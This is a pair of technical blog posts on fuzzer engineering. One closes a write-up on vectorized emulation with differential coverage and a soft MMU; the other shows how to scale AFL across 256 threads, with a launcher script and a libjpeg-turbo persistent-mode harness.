Second branch, VMs without 0x13371337 in memory are pending branches to .end, VM #2 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 0 1
Zmm31 .next2 .end .end .next2

Final branch, everyone ends up at .end, all VMs are enabled again as they’re following VM #0 to .end

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1
Zmm31 .end .end .end .end

Branch summary

So we saw branches will disable VMs which do not follow VM #0. When VMs are disabled all modifications to their register states or memory states are blocked by hardware. The kmask mechanism allows us to keep performance up and not use different JITs based on different branch states.

Further, VMs can come back online if they were pending to go to a location which VM #0 eventually ends up going to.

Exceptions/faults

These are really just glorified branches with a VM exit to save the input and memory/register state related to the crash. No reason to really go in depth here.



Okay but why?

Okay we’ve covered all the very high level details of how vectorized emulation is possible but that’s just academic thought. It’s pointless unless it accomplishes something.

At this point all of the next topics are going to be their own blogs and thus are only lightly touched on

Differential coverage / Hardware accelerated taint tracking

Differential coverage is a special type of coverage that we are able to gather with this vectorized emulation model. This is the most important aspect of all of this tooling and is the main reason it is worth doing.

Since we are running 16 VMs at a time we are able to very cheaply (a few cycles) do a horizontal comparison with other VMs. Since VMs are deterministic and only have differing user-controlled inputs any situation where VMs have different branches, different register states, different memory states, etc is when the user input directly or indirectly caused a change in behavior.

I would consider this to be the holy grail of coverage. Any affect the input has on program state we can easily and cheaply detect.
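
Conceptually the per-state check is nothing more than this (plain Rust standing in for what is really a broadcast-and-compare against VM #0 in the JIT):

/// Sketch of the differential check: did user input cause any enabled VM to
/// diverge from VM #0 in this piece of state (a register, a memory dword)?
fn diverged(state: [u32; 16], kmask: u16) -> bool {
    let reference = state[0];
    (1..16).any(|lane| (kmask >> lane) & 1 == 1 && state[lane] != reference)
}

If this returns false, the overwhelmingly common case, nothing is recorded; only divergent state ever makes it into the coverage databases.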

How differential coverage combats state explosion

If we wanted to track all register states for all instructions the state explosion would be way too huge. This can be somewhat capped by limiting the amount of state each instruction can generate. For example instead of storing all unique register values for an instruction we could simply store the minimums and maximums, or store up to n unique values, etc. However even when limited to just a few values per instruction, the state explosion is too large for any real application.

However, since most memory and register states are not influenced by user input, with differential coverage we can greatly reduce the amount of instructions which state is stored on as we only store state that was influenced by user data.

This works for code coverage as well, for example if we hit a printf with completely uncontrolled parameters that would register as potentially hundreds of new blocks of coverage. With differential coverage all of this state can be ignored.

How differential coverage is great for performance

While the focus of this tool is not performance, updating databases on every single instruction is simply not feasible. By filtering only instructions which have user-influenced data we're able to perform much more complex operations in the case that new coverage was detected.

For example all of my register loads and stores start with a horizontal compare and a quick jump out if they all match. If one differs it’s a rare enough occasion that it’s feasible to spend a few more cycles to do a hash calculation based on state and insertion into the global input and coverage databases. Without differential coverage I would have to unconditionally do this every instruction.

Soft MMU

Since the soft MMU deserves a blog entirely on its own, we'll just go slightly into the details.

As mentioned before, we interleave memory at the dword level, but for every byte there is also a corresponding permission byte. In memory this looks like 16 32-bit dwords representing the permissions, followed by 16 32-bit dwords containing their corresponding memory contents. This allows me to read a 64-byte cache line with the permissions which are checked first, followed by reading the 64-byte cache line directly following with the contents.

For permissions: the read, write, and execute bits are completely separate. This allows more exotic memory models like execute-only memory.

Since permissions are at the byte level, this means we can punch a one-byte hole anywhere in memory and accessing that byte would cause a fault. For some targets I’ll do special modifications to permissions and punch holes in unused or padding fields of structures to catch overflows of buffers contained inside structures.

Further I have a special read-after-write (RaW) bit, which is used to mark memory as uninitialized. Memory returned from allocators is marked as RaW and thus will fault if ever read before written to. This is tracked at the byte level and is one of the most useful features of the MMU. We’ll talk about how this can be made fast in a subsequent blog.
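
A rough sketch of how one of these interleaved permission/content pairs could be laid out (the bit assignments and names here are illustrative, not the actual encoding used by the MMU):

/// Illustrative permission bits, one permission byte per byte of contents
const PERM_READ:  u8 = 1 << 0;
const PERM_WRITE: u8 = 1 << 1;
const PERM_EXEC:  u8 = 1 << 2;
/// Read-after-write: memory is uninitialized and must be written before read
const PERM_RAW:   u8 = 1 << 3;

/// One guest dword's worth of state for all 16 interleaved VMs: a 64-byte
/// cache line of permissions directly followed by a 64-byte cache line of
/// contents, so the permission check and the data access are two sequential
/// aligned 512-bit reads
#[repr(C, align(64))]
struct InterleavedDword {
    perms:    [[u8; 4]; 16], // 4 permission bytes per VM, 16 VMs
    contents: [[u8; 4]; 16], // 4 content bytes per VM, 16 VMs
}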

Performance

Performance is not the goal of this project, however the numbers are a bit better than expected from the theorycrafting.

In reality it’s possible to hit up to 2 trillion emulated instructions per second, which is the clickbait title of this blog. However this is on a 32-deep unrolled loop that is just adding numbers and not hitting memory. This unrolling makes the branch divergence checking costs disappear, and integer operations are almost a 1-to-1 translation into AVX-512 instructions.

For a real target the numbers are more in the 40 billion to 120 billion emulated instructions per second range. For a real target like OpenBSD’s DHCP client I’m able to do just over 5 million fuzz cases per second (fuzz case is one DHCP transaction, typically 1 or 2 packets). For this specific target the emulation speed is 54 billion instructions per second. This is while gathering PC-level coverage and all register and memory divergence coverage.

So it’s just academic?

I’ve been working on this tooling for almost 2 years now and it’s been usable since month 3. It’s my primary tool for fuzzing and has successfully found bugs in various targets. Sadly most of these bugs are not public yet, but soon.

This tool was used to find a remote bluescreen in Windows Firewall: CVE-2018-8206 (okay technically I found it first manually, but was able to find it with the fuzzer with a byte flipper even though it has much more complex constraints)

It was also used to find a theoretical OOB in OpenBSD's dhclient: dhclient bug. This is a fun one as really no traditional fuzzer would find it, as it's an out-of-bounds by 1 inside of a structure.

Future blogs

  • Description of the IL used, as it’s got some specific designs for vectorized emulation

  • Internal details of the MMU implementation

  • Showing the power of differential coverage by looking at a real example of fuzzing an HTTP parser and having a byte flipper quickly (under 5 seconds) find the basic “VERB HTTP/number.number\r\n”. No magic, no `strings` feedback, no static analysis. Just a useless fuzzer with strong harnessing.

  • Talk about the new IL which handles graphs and can do cross-block optimizations

  • Showing better branch divergence handling via post-dominator analysis and stepping VMs until they sync up at a known future merge point

Scaling AFL to a 256 thread machine

16 September 2018 at 22:51

That's a lot of cores

Changelog

Date Info
2018-09-16 Initial
2018-09-16 Changed custom JPEG test program a little, saves 2 syscalls bringing us from 9 per fuzz case to 7 per fuzz case. Used the -O2 flag to build. Neither of these had a noticeable impact on performance, thus performance numbers were not updated.

Performance disclaimer

Performance is critical to my work and I’ve been researching specifically fuzzer performance and scaling for the past 5 years. It’s important that the performance numbers here are accurate and use tooling to their fullest. Please let me know about any suggestions that I could do to make these numbers better while still using unmodified AFL. I also was using a stock libjpeg as I do not want to make internal mods to JPEG as that increases risk of invalid results.

The machine this testing was done on is a single-socket Intel Xeon Phi 7210, a 64-core 256-thread machine (yes, 4 HW threads per core). This is clocked at 1.3 GHz and the cores are effectively Atom cores, making them much weaker than conventional ones. A single 1.3 GHz Phi core here usually runs identical code about 10-20x slower than a conventional modern Xeon at 2.8 GHz. This means that numbers here might seem unreasonably low compared to what you may expect, but it's because these are weak cores.

Intro

I’ve been trying to get AFL to scale correctly for the past day, which turns out to be fairly hard. AFL doesn’t really provide any built in way of just spinning up multiple cores by using something like afl-fuzz -j64 ..., so we have to do it ourselves. Further the machine I’m trying this on is quite exotic and not much scales correctly to it anyways. But, let’s hop right on in and give it a go! This testing is actually being done for an upcoming blog series demonstrating a neat new way of fuzzing and harnessing that I call “Vectorized Emulation”. I wanted to get the best performance numbers out of AFL so I had a reasonable comparison that would make some of the tech a bit more relatable. Stay tuned for that post hopefully within a week!

In this blog I’m going to talk about the major things to keep an eye on when you’re trying to get every drop of performance:

  • Are you using all your cores?
  • Are you scaling well?
  • Are you spending time in your actual target or other things like the kernel?

If you’re just spinning up one process per core, it’s very possible that all of these are not true. We’ll go through a real example of this process and how easy it is to fall into a trap of not effectively using your cores.

Target selection

First of all, we need a good target that we can try to fuzz as fast as possible. Something that is common, reasonably small, and easy to convert to use AFL persistent mode. I’ve decided to look at libjpeg-turbo as it’s a common target, many people are probably already familiar, and it’s quite simple to just throw in a loop. Further if we found a bug it’d be a pretty good day, so it’s always fun to play with real targets.

Fuzzing out of the can

The first thing I’m going to try on almost any new target I look at will be to find a tool that already comes with the source that in some way parses the image. In this case for libjpeg-turbo we can actually use the tool that comes with called djpeg. This is a simple command line utility that takes in a file over stdin or via a command line argument, and produces another output file potentially of another format. Since we know we are going to use AFL, let’s get a basic AFL environment set up. It’s pretty simple, and in our case we’re using afl-2.52b the latest at the time of writing this blog. We’re not using ASAN as we’re looking for best case performance numbers.

pleb@debphi:~/blogging$ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
--2018-09-16 16:09:11--  http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
Resolving lcamtuf.coredump.cx (lcamtuf.coredump.cx)... 199.58.85.40
Connecting to lcamtuf.coredump.cx (lcamtuf.coredump.cx)|199.58.85.40|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 835907 (816K) [application/x-gzip]
Saving to: ‘afl-latest.tgz’

afl-latest.tgz                                              100%[========================================================================================================================================>] 816.32K   323KB/s    in 2.5s

2018-09-16 16:09:14 (323 KB/s) - ‘afl-latest.tgz’ saved [835907/835907]

pleb@debphi:~/blogging$ tar xf afl-latest.tgz
pleb@debphi:~/blogging$ cd afl-2.52b/
pleb@debphi:~/blogging/afl-2.52b$ make -j256
[*] Checking for the ability to compile x86 code...
[+] Everything seems to be working, ready to compile.
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-gcc.c -o afl-gcc -ldl
set -e; for i in afl-g++ afl-clang afl-clang++; do ln -sf afl-gcc $i; done
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-fuzz.c -o afl-fuzz -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-showmap.c -o afl-showmap -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-tmin.c -o afl-tmin -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-gotcpu.c -o afl-gotcpu -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-analyze.c -o afl-analyze -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-as.c -o afl-as -ldl
ln -sf afl-as as
[*] Testing the CC wrapper and instrumentation output...
unset AFL_USE_ASAN AFL_USE_MSAN; AFL_QUIET=1 AFL_INST_RATIO=100 AFL_PATH=. ./afl-gcc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" test-instr.c -o test-instr -ldl
echo 0 | ./afl-showmap -m none -q -o .test-instr0 ./test-instr
echo 1 | ./afl-showmap -m none -q -o .test-instr1 ./test-instr
[+] All right, the instrumentation seems to be working!
[+] LLVM users: see llvm_mode/README.llvm for a faster alternative to afl-gcc.
[+] All done! Be sure to review README - it's pretty short and useful.

Out of the box AFL gives us compiler wrappers for gcc and clang, afl-gcc and afl-clang respectively. We’ll use these to build the libjpeg-turbo source so AFL adds the instrumentation used for coverage and feedback, which is critical to modern fuzzer operation, especially when just doing byte flipping like AFL does.

Let’s grab libjpeg-turbo and build it:

pleb@debphi:~/blogging$ git clone https://github.com/libjpeg-turbo/libjpeg-turbo
Cloning into 'libjpeg-turbo'...
remote: Counting objects: 13559, done.
remote: Compressing objects: 100% (40/40), done.
remote: Total 13559 (delta 14), reused 8 (delta 1), pack-reused 13518
Receiving objects: 100% (13559/13559), 11.67 MiB | 8.72 MiB/s, done.
Resolving deltas: 100% (10090/10090), done.
pleb@debphi:~/blogging$ mkdir buildjpeg
pleb@debphi:~/blogging$ cd buildjpeg/
pleb@debphi:~/blogging/buildjpeg$ export PATH=$PATH:/home/pleb/blogging/afl-2.52b
pleb@debphi:~/blogging/buildjpeg$ cmake -G"Unix Makefiles" -DCMAKE_C_COMPILER=afl-gcc -DCMAKE_C_FLAGS=-m32 /home/pleb/blogging/libjpeg-turbo/
...
pleb@debphi:~/blogging/buildjpeg$ make -j256
...
[100%] Built target tjunittest-static
pleb@debphi:~/blogging/buildjpeg$ ls
cjpeg           CMakeFiles             CTestTestfile.cmake  jconfig.h     jpegtran         libjpeg.map    libjpeg.so.62.3.0  libturbojpeg.so.0      md5         sharedlib  tjbench-static  tjexampletest      wrjpgcom
cjpeg-static    cmake_install.cmake    djpeg                jconfigint.h  jpegtran-static  libjpeg.so     libturbojpeg.a     libturbojpeg.so.0.2.0  pkgscripts  simd       tjbenchtest     tjunittest
CMakeCache.txt  cmake_uninstall.cmake  djpeg-static         jcstest       libjpeg.a        libjpeg.so.62  libturbojpeg.so    Makefile               rdjpgcom    tjbench    tjexample       tjunittest-static

Woo! We have libjpeg-turbo built and instrumented with AFL! We now have a ./djpeg binary which is what we’re going to fuzz. We need a test input corpus of JPEGs; however, since we’re benchmarking, I just picked a single JPEG that is 3.2 KiB in size. We’ll set up AFL and fuzz this with no frills:

pleb@debphi:~/blogging$ mkdir fuzzing
pleb@debphi:~/blogging$ cd fuzzing/
pleb@debphi:~/blogging/fuzzing$ mkdir inputs
... Copy in an input
pleb@debphi:~/blogging/fuzzing$ mkdir outputs
pleb@debphi:~/blogging/fuzzing$ afl-fuzz -h
pleb@debphi:~/blogging/fuzzing$ afl-fuzz -i inputs/ -o outputs/ -- ../buildjpeg/djpeg @@

Now we’re hacking!

Oh wow we're a hacker

It’s important that you keep an eye on exec speed as it can flutter around during different passes; in this case 210-220 execs/sec is where it seemed to hover on average, so I’ll be using the 214.4 number from the picture as the baseline for this first test.

Using all your cores

I’ve got some sad news though. This isn’t using anything but a single core. We have a 256 thread machine and we’re using 1/256th of it to fuzz, what a waste of silicon. Sadly there’s no trivial way to spin up AFL across cores, so let’s just cheat and grab something that does it for us: afl-launch. This requires Go, but the instructions are pretty clear on how to get it set up and running. It takes effectively the same args as afl-fuzz, plus an -n parameter that spins up multiple jobs for us. Let’s also switch to a ramdisk to decrease thrashing of the disk (it doesn’t matter that much anyways due to FS caching):

pleb@debphi:~/blogging/fuzzing$ rm -rf /mnt/ram/outputs/*
pleb@debphi:~/blogging/fuzzing$ ~/go/bin/afl-launch -n 256 -i /mnt/ram/inputs/ -o /mnt/ram/outputs/ -- ../buildjpeg/djpeg @@

And we expect roughly 214 * 64 (single-core execs/sec * number of physical cores) = ~14k execs/sec. In reality I expect even more than this due to hyperthreading.

pleb@debphi:~/blogging/fuzzing$ ps a | grep afl-fuzz | grep -v grep | wc -l
256
pleb@debphi:~/blogging/fuzzing$ afl-whatsup -s /mnt/ram/outputs/
status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 0 days, 10 hours
         Total execs : 0 million
    Cumulative speed : 4108 execs/sec
       Pending paths : 455 faves, 14932 total
  Pending per fuzzer : 1 faves, 58 total (on average)
       Crashes found : 0 locally unique

Hmm? What? I’m running 256 instances, afl-whatsup confirms that, but I’m only getting 4.1k execs/sec? That’s only a ~20x speedup from running 256 threads!? Hmm, this is no good. We even switched to a ramdisk, so we even have an advantage over the single threaded run. Let’s check out that CPU utilization:

Wait what

Actually using all your cores

Okay, so apparently we’re only using 22 threads even though we have 256 processes running. Linux will normally distribute processes evenly across cores, so AFL must be doing something special here. If we look around for affinity in the AFL codebase we stumble across this:

/* Build a list of processes bound to specific cores. Returns -1 if nothing
   can be found. Assumes an upper bound of 4k CPUs. */

static void bind_to_free_cpu(void) {

  DIR* d;
  struct dirent* de;
  cpu_set_t c;

  u8 cpu_used[4096] = { 0 };
  u32 i;

  if (cpu_core_count < 2) return;

  if (getenv("AFL_NO_AFFINITY")) {

    WARNF("Not binding to a CPU core (AFL_NO_AFFINITY set).");
    return;

  }

  d = opendir("/proc");

  if (!d) {

    WARNF("Unable to access /proc - can't scan for free CPU cores.");
    return;

  }

  ACTF("Checking CPU core loadout...");

  /* Introduce some jitter, in case multiple AFL tasks are doing the same
     thing at the same time... */

  usleep(R(1000) * 250);

  /* Scan all /proc/<pid>/status entries, checking for Cpus_allowed_list.
     Flag all processes bound to a specific CPU using cpu_used[]. This will
     fail for some exotic binding setups, but is likely good enough in almost
     all real-world use cases. */

  while ((de = readdir(d))) {

    u8* fn;
    FILE* f;
    u8 tmp[MAX_LINE];
    u8 has_vmsize = 0;

    if (!isdigit(de->d_name[0])) continue;

    fn = alloc_printf("/proc/%s/status", de->d_name);

    if (!(f = fopen(fn, "r"))) {
      ck_free(fn);
      continue;
    }

    while (fgets(tmp, MAX_LINE, f)) {

      u32 hval;

      /* Processes without VmSize are probably kernel tasks. */

      if (!strncmp(tmp, "VmSize:\t", 8)) has_vmsize = 1;

      if (!strncmp(tmp, "Cpus_allowed_list:\t", 19) &&
          !strchr(tmp, '-') && !strchr(tmp, ',') &&
          sscanf(tmp + 19, "%u", &hval) == 1 && hval < sizeof(cpu_used) &&
          has_vmsize) {

        cpu_used[hval] = 1;
        break;

      }

    }

    ck_free(fn);
    fclose(f);

  }

  closedir(d);

  for (i = 0; i < cpu_core_count; i++) if (!cpu_used[i]) break;

  if (i == cpu_core_count) {

    SAYF("\n" cLRD "[-] " cRST
         "Uh-oh, looks like all %u CPU cores on your system are allocated to\n"
         "    other instances of afl-fuzz (or similar CPU-locked tasks). Starting\n"
         "    another fuzzer on this machine is probably a bad plan, but if you are\n"
         "    absolutely sure, you can set AFL_NO_AFFINITY and try again.\n",
         cpu_core_count);

    FATAL("No more free CPU cores");

  }

  OKF("Found a free CPU core, binding to #%u.", i);

  cpu_aff = i;

  CPU_ZERO(&c);
  CPU_SET(i, &c);

  if (sched_setaffinity(0, sizeof(c), &c))
    PFATAL("sched_setaffinity failed");

}

#endif /* HAVE_AFFINITY */

We can see that this code does some interesting processing on procfs to find which processors are not in use, and then pins to them. Interestingly we never get the “Uh-oh” message saying we’re out of CPUs, and all 256 of our instances are running. The only way this is possible is if AFL is binding multiple processes to the same core. This is possible due to races on the procfs and the CPU masks not getting updated right away, so some delay has to be added between spinning up AFL instances. But we can do better.

We can see at the top of this function that this behavior can be turned off entirely by setting the AFL_NO_AFFINITY environment variable. Let’s do that and then manage the affinities ourselves. We’re also going to drop the afl-launch tool and just do it ourselves:

import subprocess, threading, time, shutil, os

NUM_CPUS = 256

INPUT_DIR  = "/mnt/ram/jpegs"
OUTPUT_DIR = "/mnt/ram/outputs"

def do_work(cpu):
    master_arg = "-M"
    if cpu != 0:
        master_arg = "-S"

    # Restart if it dies, which happens on startup a bit
    while True:
        try:
            sp = subprocess.Popen([
                "taskset", "-c", "%d" % cpu,
                "afl-fuzz", "-i", INPUT_DIR, "-o", OUTPUT_DIR,
                master_arg, "fuzzer%d" % cpu, "--",
                "../buildjpeg/djpeg", "@@"],
                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            sp.wait()
        except:
            pass

        print("CPU %d afl-fuzz instance died" % cpu)

        # Some backoff if we fail to run
        time.sleep(1.0)

assert os.path.exists(INPUT_DIR), "Invalid input directory"

if os.path.exists(OUTPUT_DIR):
    print("Deleting old output directory")
    shutil.rmtree(OUTPUT_DIR)

print("Creating output directory")
os.mkdir(OUTPUT_DIR)

# Disable AFL affinity as we do it better
os.environ["AFL_NO_AFFINITY"] = "1"

for cpu in range(0, NUM_CPUS):
    threading.Timer(0.0, do_work, args=[cpu]).start()

    # Let master stabilize first
    if cpu == 0:
        time.sleep(1.0)

while threading.active_count() > 1:
    time.sleep(5.0)

    try:
        subprocess.check_call(["afl-whatsup", "-s", OUTPUT_DIR])
    except:
        pass

By using taskset when we spawn AFL processes we manually control the core, rather than having AFL try to figure out what is not being used; we already know what’s free since we’re launching everything. Further, we set os.environ["AFL_NO_AFFINITY"] = "1" to make sure AFL doesn’t take control over affinity, as we now manage it. We’ve got some other things in here too: we give 1 second of delay after the master instance, we automatically clean up the output directory, and we call afl-whatsup in a loop. We also restart dead afl-fuzz instances, which I’ve observed can happen sometimes when spawning everything at once.
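If you want to double check that the pinning actually took, here’s a small sketch (not from the original workflow; it assumes Linux and Python 3, and the helper name afl_core_pins is made up) that walks /proc and asks the kernel for each afl-fuzz process’s affinity mask, the same information AFL itself was scraping from Cpus_allowed_list above:

import os
from collections import Counter

def afl_core_pins():
    # Map of core -> number of afl-fuzz processes pinned to it
    pins = Counter()
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/cmdline" % pid, "rb") as f:
                argv = f.read().split(b"\0")
            if not argv or b"afl-fuzz" not in argv[0]:
                continue
            cpus = os.sched_getaffinity(int(pid))
        except OSError:
            continue  # process went away while we were looking at it
        if len(cpus) != 1:
            print("pid %s is not pinned to a single core: %r" % (pid, sorted(cpus)))
        else:
            pins[cpus.pop()] += 1
    return pins

pins = afl_core_pins()
shared = [cpu for cpu, count in pins.items() if count > 1]
print("%d pinned afl-fuzz processes, %d cores double-booked" % (sum(pins.values()), len(shared)))

After letting the launcher run for a while, afl-whatsup reports: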

status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 1 days, 0 hours
         Total execs : 6 million
    Cumulative speed : 18363 execs/sec
       Pending paths : 1 faves, 112903 total
  Pending per fuzzer : 0 faves, 441 total (on average)
       Crashes found : 0 locally unique

But it worked

Well that gave us a 4.5x speedup! Look at that CPU utilization!

Optimizing our target for maximum CPU time

We’re now using 100% of all cores. If you’re not an htop master, you might not know that the red on the bars means kernel time. This means that (eyeballing it) we’re spending about 50% of the CPU time in the kernel. Any time in the kernel is time not spent fuzzing JPEGs. At this point we’ve got AFL doing everything it can, but we’re gonna have to get more creative with our target.

So this is telling us we should be able to find at least a 2x speedup on this target, moving our goal to ~40k execs/sec. It’s possible the kernel usage is unavoidable, but for something like libjpeg-turbo it would be unreasonable to spend any large amount of time in the kernel anyways. Let’s use everything AFL gives us by switching to AFL persistent mode. This effectively allows you to run multiple fuzz cases in a single instance of the program rather than reverting program state back every fuzz case via clone() or fork(). This can reduce that kernel overhead we’re worried about.
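To put a number on the kernel overhead for a specific fuzz child rather than the whole box, you can read utime and stime out of /proc/<pid>/stat (fields 14 and 15). This is just an illustrative sketch, not something from the original workflow; it assumes Linux and Python 3, and the helper name user_kernel_split is made up:

import sys

def user_kernel_split(pid):
    # utime and stime are the 14th and 15th fields of /proc/<pid>/stat;
    # comm can contain spaces, so split after the closing paren first
    with open("/proc/%d/stat" % pid) as f:
        rest = f.read().rsplit(")", 1)[1].split()
    utime, stime = int(rest[11]), int(rest[12])
    total = float(utime + stime) or 1.0
    return 100.0 * utime / total, 100.0 * stime / total

if __name__ == "__main__":
    # Usage: pass the pid of one of the fuzz children
    user, kernel = user_kernel_split(int(sys.argv[1]))
    print("user %.1f%% / kernel %.1f%%" % (user, kernel))

Running it against a few of the fuzz children gives a more direct picture of where their time goes than the whole-machine view.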

Let’s set up the persistent mode environment by building afl-clang-fast.

pleb@debphi:~/blogging$ cd afl-2.52b/llvm_mode/
pleb@debphi:~/blogging/afl-2.52b/llvm_mode$ make -j8
[*] Checking for working 'llvm-config'...
[*] Checking for working 'clang'...
[*] Checking for '../afl-showmap'...
[+] All set and ready to build.
clang -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  afl-clang-fast.c -o ../afl-clang-fast
ln -sf afl-clang-fast ../afl-clang-fast++
clang++ `llvm-config --cxxflags` -fno-rtti -fpic -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DVERSION=\"2.52b\" -Wno-variadic-macros -shared afl-llvm-pass.so.cc -o ../afl-llvm-pass.so `llvm-config --ldflags`
warning: unknown warning option '-Wno-maybe-uninitialized'; did you mean '-Wno-uninitialized'? [-Wunknown-warning-option]
1 warning generated.
clang -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  -fPIC -c afl-llvm-rt.o.c -o ../afl-llvm-rt.o
[*] Building 32-bit variant of the runtime (-m32)... success!
[*] Building 64-bit variant of the runtime (-m64)... success!
[*] Testing the CC wrapper and instrumentation output...
unset AFL_USE_ASAN AFL_USE_MSAN AFL_INST_RATIO; AFL_QUIET=1 AFL_PATH=. AFL_CC=clang ../afl-clang-fast -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  ../test-instr.c -o test-instr
echo 0 | ../afl-showmap -m none -q -o .test-instr0 ./test-instr
echo 1 | ../afl-showmap -m none -q -o .test-instr1 ./test-instr
[+] All right, the instrumentation seems to be working!
[+] All done! You can now use '../afl-clang-fast' to compile programs.

Now we have an afl-clang-fast binary in the afl-2.52b folder. Let’s rebuild libjpeg-turbo using this:

pleb@debphi:~/blogging/buildjpeg$ cmake -G"Unix Makefiles" -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_C_FLAGS=-m32 /home/pleb/blogging/libjpeg-turbo/
pleb@debphi:~/blogging/buildjpeg$ make -j256
...
[100%] Built target jpegtran-static
afl-clang-fast 2.52b by <[email protected]>
[100%] Built target jpegtran

So, libjpeg-turbo is a library, meaning it’s designed to be used from other programs. It’s also one of the most popular libraries for image compression, so surely it’s relatively easy to use. Let’s quickly write up a bare-bones application that loads an image from a provided argument:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include "jpeglib.h"
#include <setjmp.h>

struct my_error_mgr {
  struct jpeg_error_mgr pub;    /* "public" fields */
  jmp_buf setjmp_buffer;        /* for return to caller */
};

typedef struct my_error_mgr * my_error_ptr;

// Longjmp out on errors
METHODDEF(void)
my_error_exit(j_common_ptr cinfo)
{
  my_error_ptr myerr = (my_error_ptr) cinfo->err;
  longjmp(myerr->setjmp_buffer, 1);
}


// Eat warnings
METHODDEF(void)
emit_message(j_common_ptr cinfo, int msg_level) {}

GLOBAL(int)
read_JPEG_file (char * filename, unsigned char *filebuf, size_t filebuflen)
{
  struct jpeg_decompress_struct cinfo;
  struct my_error_mgr jerr;
  JSAMPARRAY buffer;            /* Output row buffer */
  int row_stride;               /* physical row width in output buffer */
  int fd;
  ssize_t flen;

  fd = open(filename, O_RDONLY);
  if(fd == -1){
    return 0;
  }

  flen = read(fd, (void*)filebuf, filebuflen);
  close(fd);

  if(flen <= 0){
    return 0;
  }

  cinfo.err = jpeg_std_error(&jerr.pub);
  jerr.pub.error_exit = my_error_exit;
  jerr.pub.emit_message = emit_message;

  /* Establish the setjmp return context for my_error_exit to use. */
  if (setjmp(jerr.setjmp_buffer)) {
    jpeg_destroy_decompress(&cinfo);
    return 0;
  }

  jpeg_create_decompress(&cinfo);
  jpeg_mem_src(&cinfo, filebuf, flen);
  (void) jpeg_read_header(&cinfo, TRUE);
  (void) jpeg_start_decompress(&cinfo);
  row_stride = cinfo.output_width * cinfo.output_components;
  buffer = (*cinfo.mem->alloc_sarray)
                ((j_common_ptr) &cinfo, JPOOL_IMAGE, row_stride, 1);

  while (cinfo.output_scanline < cinfo.output_height) {
    (void) jpeg_read_scanlines(&cinfo, buffer, 1);
  }

  (void) jpeg_finish_decompress(&cinfo);
  jpeg_destroy_decompress(&cinfo);
  return 1;
}

int main(int argc, char *argv[]) {
  void *filebuf = NULL;
  const size_t filebuflen = 32 * 1024;

  if(argc != 2) { fprintf(stderr, "Nice usage noob\n"); return -1; }

  filebuf = malloc(filebuflen);
  if(!filebuf) {
    return -1;
  }

  while(__AFL_LOOP(100000)) {
    read_JPEG_file(argv[1], filebuf, filebuflen);
  }
}

This can be built with:

AFL_PATH=/home/pleb/blogging/afl-2.52b afl-clang-fast -O2 -m32 example.c -I/home/pleb/blogging/buildjpeg -I/home/pleb/blogging/libjpeg-turbo /home/pleb/blogging/buildjpeg/libjpeg.a

You can see the code this was derived from (with more comments) here, which I modified to my specific needs, removing almost all comments to keep the code as small as possible. It’s also relatively simple to read based off the function names.

We made a few changes to the code. We removed all output: it should not print warnings or errors to the screen, it should not save any files, it should only parse the input. It then correctly returns up via setjmp()/longjmp() on errors, allowing us to quickly move on to the next case.

